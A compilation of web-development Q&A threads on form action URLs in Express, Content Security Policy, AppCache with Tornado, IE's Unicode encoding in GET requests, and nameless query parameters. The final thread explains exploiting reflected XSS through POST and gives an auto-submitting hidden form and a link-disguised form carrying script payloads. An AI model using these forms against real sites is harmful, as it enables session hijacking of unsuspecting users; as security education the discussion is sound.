Node Express routes - Absolute URL vs Relative URL - node.js

I have a simple form of this type
<form name="keywords" action="www.mydomain.com:6161/articles" method="post">
<input type="text" name="keyword" />
<input type="submit" name="submit" value="Submit" />
</form>
The Express 4 route for handling the form post is as follows:
app.post('/articles', routes.article.keyword);
The actual route file has the following
exports.keyword = function(req,res,next){
res.send(req.body.keyword);
};
Based on the above, when I post the form in the browser, I see a page saying “The address wasn’t understood”.
But if I use a relative URL in the form action, i.e. action="/articles", it works perfectly. Why is that?
I ask because in reality I may sometimes have to post data to a different domain or URL altogether.

I will post my comment as an answer as it helped.
In order for the action to work, you need to either specify a full URL that includes the scheme:
<form name="keywords" action="http://www.example.com/articles" method="post">
Or you can just use a relative URL:
<form name="keywords" action="/articles" method="post">

A relative path is one not starting with a / (forward slash). Generally, it resolves against the current URL's base directory (you can override this in HTML with a <base> element, though browsers default to the 'dirname' of the URL; e.g. 'img/something.gif' on a page at '/some/path/index.html' is fetched from '/some/path/img/something.gif').
An absolute path is one starting with a /. It is loaded using the same scheme, host and, optionally, port, user, etc. (full URL syntax: scheme:[//[user:password@]host[:port]][/]path[?query][#fragment]; read more here: https://en.wikipedia.org/wiki/Uniform_Resource_Locator).
A full URL is one starting with a scheme (http/https/ftp, etc.). However (and this comes in handy), if you're going to use the same scheme (which keeps your site's security score high), you can skip it along with the colon.
E.g., while viewing a site at 'https://blah.net' and loading a resource from Google (analytics, maybe), you can reference it as:
'//google.com/path/to/whatever'
This will use https if the page was loaded over https, and http otherwise; it keeps you from having to determine the scheme that was used when rendering the page.
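The three rules above can be checked directly with the WHATWG URL class (global in modern browsers and in Node); the base URL below is the hypothetical page from the example:

```javascript
const base = 'https://blah.net/some/path/index.html';

// relative path: resolved against the base URL's directory
const rel = new URL('img/something.gif', base).href;
// → 'https://blah.net/some/path/img/something.gif'

// absolute path: same scheme and host, path replaced from the root
const abs = new URL('/articles', base).href;
// → 'https://blah.net/articles'

// scheme-relative URL: inherits the base page's scheme
const proto = new URL('//google.com/path/to/whatever', base).href;
// → 'https://google.com/path/to/whatever'
```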

Related

Content Security Policy: Allow files after initial load?

The Content-Security-Policy header is, in theory, awesome. In practice, I've run into a problem. If a page sets the CSP and you later load, for example, a login page dynamically, the JS files for that page must already have been included: even if the login page references a script by an absolute URL that matches the domain the index page came from (and that is allowed in the CSP's script-src), the browser prevents it from loading.
When I used a nonce to try to circumvent this, the same issue arose, but it was intermittent. Sometimes it would let the same-nonce javascript file load in, and sometimes it wouldn't.
In case it's unclear, the dynamically-loaded script triggers CSP's idea of an "unsafe-inline script."
Is there a 100% effective way to load dynamic JS/CSS files with a strong CSP?
Freeform code example:
index.php:
<?php header("Content-Security-Policy: default-src 'none'; script-src 'self' https://example.com"); ?>
<script src="triggerLogin.js"></script>
<a href="#" class="loginLink">Login</a>
<div class="futureLoginPage"></div>
triggerLogin.js: (CSP Allows)
$('.loginLink').on('click', function(event)
{
$('.futureLoginPage').load('/login.php');
event.stopPropagation();
event.preventDefault();
return false;
});
login.php:
<script src="https://example.com/loginFormVerify.js" type="text/javascript"></script>
<input type="text" class="user" placeholder="Username" />
<input type="text" class="pass" placeholder="Password" />
<input type="button" class="send" value="Send" />
<div class="authStatus"></div>
loginFormVerify.js: (CSP Forbids)
$('.send').on('click', function()
{
$.post("/verification.php", { user: $('.user').val(), pass: $('.pass').val() }, function(data)
{
$('.authStatus').html(data);
});
});
It doesn't matter if I use https://example.com/ in the 'post' functions, as CSP doesn't even load the loginFormVerify.js file, let alone check its contents.
Conversely, it doesn't matter if I remove https://example.com/ from the JS script sources and let them resolve against the page's own domain. It still fails.
It doesn't matter if I add type="text/javascript" or type="application/javascript" to one or both of the tags, either. And as mentioned above, a nonce only intermittently helps on a dynamically-loaded JS file sent from the server.
While we're at it, it doesn't matter if I have ' ' around the domain name in the header.
Also, I can remove the </script> tags and use the below to the exact same result:
<script src="..." />
I've attempted the above connection style on Safari, Chrome and Firefox with identical results. Safari and Chrome on mobile as well.
I'm aware one workaround is to condense all JS functionality into a single file at the index.php level, but I'm curious if there's a way to handle this some other way.
I make no guarantees that the above example code works in any capacity and recognize the above snippet is far from best practice.
The point of the above code is exclusively to provide an example of how CSP fails to provide a desired result in a dynamic environment, for the purposes of the question:
Is there a 100% effective workaround without reducing CSP's useful nature, other than preloading all scripts (Which can be harmful to speed, maintenance, bandwidth, and -- for those that care -- SEO)?

How to use Appcache with web frameworks?

I have a problem with the main page being cached. I use Tornado, and Tornado generates a special value every time the server is reached: a token to avoid XSRF attacks. But when I use an .appcache file, the problem is that it caches everything! I only want to cache static assets like CSS, JS, and fonts. Here is what the manifest contains:
CACHE MANIFEST
# v = 2
/static/css/meteo.css
/static/css/semantic.min.css
/static/js/jquery-2.1.1.min.js
/static/css/main.css
/static/js/semantic.min.js
/static/js/geo.js
/static/js/meteo.js
/static/fonts/icons.woff2
/static/fonts/icons.woff
/static/fonts/WeatherIcons-Regular.woff
NETWORK:
/
FALLBACK:
It doesn't work; / gets cached anyway!
So how do you do this with a modern framework, where you don't serve an HTML file per route, but instead bind a URI to a function/class?
Here is a video I made about it
And it seems that the master entry is always cached.
Update: according to this page, there is no way!
But, you say, why don't we just not cache the HTML file, and cache all the rest?
Well, AppCache has a concept of “master entries”. A master entry is an HTML file that includes a manifest attribute on the html element pointing to a manifest file (which is the only way to create an HTML5 appcache, BTW). Any such HTML file is automatically added to the cache. This makes sense a lot of the time, but not always. In particular, when an HTML document changes frequently, we won't want it cached (as a stale version of the page will most likely be served to the user, as we just saw).
Is there no way to override this? Well, AppCache has the idea of a
NETWORK whitelist, which instructs the appcache to always use the
online version of a file. What if we add HTML files we don't want
cached to this? Sorry, no dice. HTML files in a master entry stay
cached, even when included in the NETWORK whitelist. See what I mean?
Poor AppCache didn't make these rules. He's just following them
literally. He's not a douchebag, he's a pain in the %^&*, a total
“jobsworth”.
I got the solution from here:
I made a hack.html which contains:
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Hack 4 Manifest</title>
</head>
<body>
{% raw xsrf_form_html() %}
</body>
</html>
And then
Add this in the main page:
<iframe style='display: none;' src='/hack'></iframe>
And then in Tornado:
(r"/hack", handlers.Hack),

class Hack(MainHandler):
    @tornado.gen.coroutine
    def get(self):
        self.render("hack.html")
And then I use the javascript call:
xsrf = $("iframe").contents().find("input").val()
$("#laat").html('<input id="lat" type="hidden" name="lat"><input type="hidden" name="_xsrf" value="'+xsrf+'"><input id="lon" type="hidden" name="lon"><input class="ui fluid massive yellow button" value="Get forecast" type="submit"/>');
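The last step above can be factored into a small helper so the token injection is testable on its own (the function name is hypothetical, not part of Tornado):

```javascript
// Hypothetical helper: given the _xsrf token read out of the hidden iframe,
// build the hidden-input markup Tornado's XSRF check expects in the form.
// Tokens are assumed URL-safe strings, so no HTML escaping is done here.
function xsrfInput(token) {
  return '<input type="hidden" name="_xsrf" value="' + token + '">';
}

// usage with the iframe hack above (jQuery assumed):
//   var xsrf = $("iframe").contents().find("input").val();
//   $("#laat").append(xsrfInput(xsrf));
```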

IE sends ? character instead of Unicode characters in HTTP GET

I've created a web form for search operation in one of my projects, and the HTML is pretty simple:
<form action='/search' method="get">
<input type="text" id='search-term' name='search-term' />
<input type="submit" id='start-search' alt='' value="" />
</form>
So, when the user types a Unicode search term and hits Enter, an HTTP GET request is sent to the server with this URL:
http://www.example.com/search?search-term=مثال
This, at the server, becomes:
http://www.example.com/search?search-term=%D9%85%D8%AB%D8%A7%D9%84
and I'm able to retrieve the decoded value of the search-term query string using HttpContext.Current.Server.UrlDecode("%D9%85%D8%AB%D8%A7%D9%84") which returns مثال to me. Till here everything works fine and I have no problem.
However, if somebody types the aforementioned address directly into IE9 and hits Enter, then what I get at the server is:
http://www.example.com/search?search-term=????
What's wrong here?
Update: We checked the traffic via Fiddler, and you can see the result in following pictures:
HTTP Get headers, captured by Fiddler, requested with Firefox
HTTP Get headers, captured by Fiddler, requested with IE
IE does not know what charset you want to use when typing the URL manually, so it has to use a default charset. ? characters occur when Unicode characters are converted to an Ansi charset that does not support those Unicode characters. When submitting a webform instead, IE uses the charset of the webform, which can be specified by the <form> tag itself, in <meta> tags within the HTML document, or the HTTP Content-Type header, so there is less chance that IE has to guess the correct charset to use.
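The percent-encoded form Firefox sent can be reproduced in script: encodeURIComponent emits the UTF-8 bytes of each character, which is the reliable way to build such a URL programmatically rather than depending on the browser's guess:

```javascript
// 'مثال' is the Arabic search term from the question.
const term = 'مثال';
const encoded = encodeURIComponent(term);
// → '%D9%85%D8%AB%D8%A7%D9%84' (the UTF-8 bytes, percent-encoded)
const url = 'http://www.example.com/search?search-term=' + encoded;
```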

Form GET no parameter name

<FORM METHOD=GET ACTION="../cgi-bin/mycgi.pl">
<INPUT NAME="town"><BR>
<INPUT TYPE=SUBMIT>
</FORM>
Will redirect us to
../cgi-bin/mycgi.pl?town=example
but I want to redirect to
../cgi-bin/mycgi.pl?example
That is, can I remove the parameter name from the URI?
I tried to Google this, but found nothing like it.
Thanks in advance.
No, you cannot remove the parameter name in a standard GET request.
It's simply how HTTP requests are made: every parameter must have a name, so each input produces a (name=value) pair.
What you are trying to achieve can be accomplished with JavaScript processing of the submitted form, which takes the input named town and redirects the user to such a URL.
Something like:
<script type="text/javascript">
// run on submit, not on page load, otherwise the redirect fires before
// the user has typed anything (the script must appear after the form)
document.forms[0].onsubmit = function () {
    var elem = document.getElementById("town");
    window.location = "path_to_script/mycgi.pl?" + encodeURIComponent(elem.value);
    return false; // cancel the normal name=value submission
};
</script>
But in html you have to specify your town as following
<input type="text" name="town" id="town" />
GET will always send the variables in the query string, as ?variable=value&variable2=value2.
What you could do is have the form post to itself by removing the action attribute and using method=post. Then parse $_POST, build the URL you need, and redirect to it.
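For completeness, the receiving script can still read a nameless query such as mycgi.pl?example: the raw query string is simply everything after the ?, with no name=value structure. A sketch with the WHATWG URL class (the host below is hypothetical):

```javascript
// With no '=' in the query, the whole string after '?' is a bare value
// that the CGI script must interpret itself.
const u = new URL('http://host.example/cgi-bin/mycgi.pl?example');
const bare = u.search.slice(1); // drop the leading '?'
// → 'example'
```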

What methods are used to exploit XSS if a param echo'd is changed from GET to POST?

Examine this example. It is in PHP, but you should be able to pick up what is happening if you don't know PHP.
echo 'You searched for "' . $_GET['q'] . '"';
Now, obviously, this is a bad idea, if I request...
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
OK, now I change that GET to a POST...
echo 'You searched for "' . $_POST['q'] . '"';
Now the query string in the URL won't work.
I know I can't use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.
One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.
So, what are the ways of exploiting the second example (using POST)?
Thanks
Here is an XSS exploit for your vulnerable code. As you have alluded to, this is an identical attack pattern to POST-based CSRF. In this case I am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit-type input in the form. The POST request will execute immediately and the page will redirect; it is best to run POST-based CSRF exploits in an invisible iframe.
<html>
<body>
<form id="xss" method="post" action="http://victim/vuln.php">
<input type="hidden" name="q" value="<script>alert(/xss/)</script>">
<input type="submit">
</form>
<script>
document.getElementById("xss").submit(); // fires the POST immediately on load
</script>
</body>
</html>
I also recommend reading about the Samy worm, and feel free to ask any questions about other exploits I have written.
All I would need to do to exploit this is get a user to click a form that sends a tainted "q" POST variable. If I were being all nasty-like, I would craft a form button that looks like a link (or even a link that gets written into a form POST with JavaScript, sort of like how Rails did its link_to_remote stuff pre-3.0).
Imagine something like this:
<form id="nastyform" method="post" action="http://yoururl.com/search.php">
<input type="submit" value="Click here for free kittens!">
<input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
</form>
<style>
#nastyform input {
border: 0;
background: #fff;
color: #00f;
padding: 0;
margin: 0;
cursor: pointer;
text-decoration: underline;
}
</style>
If I can get a user to click that (thinking that he's clicking some innocent link), then I can post arbitrary data to the search that then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.
Post data isn't inherently more secure than get data; it's still user input and absolutely cannot be trusted.
CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user; this has the same sort of entry vector, but it's a classic XSS attack, designed to result in the injection of malicious Javascript into the page for the purpose of gaining session access or something similarly damaging.
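The defense against both variants is the same: output-encode user input before echoing it (htmlspecialchars in the PHP examples above). A minimal JavaScript equivalent, shown as a sketch rather than a complete sanitizer:

```javascript
// Escape the five characters significant in HTML text and double-quoted
// attribute contexts; enough to neutralize the <script> payloads above.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}
// escapeHtml('<script>alert(/xss/)</script>')
// → '&lt;script&gt;alert(/xss/)&lt;/script&gt;'
```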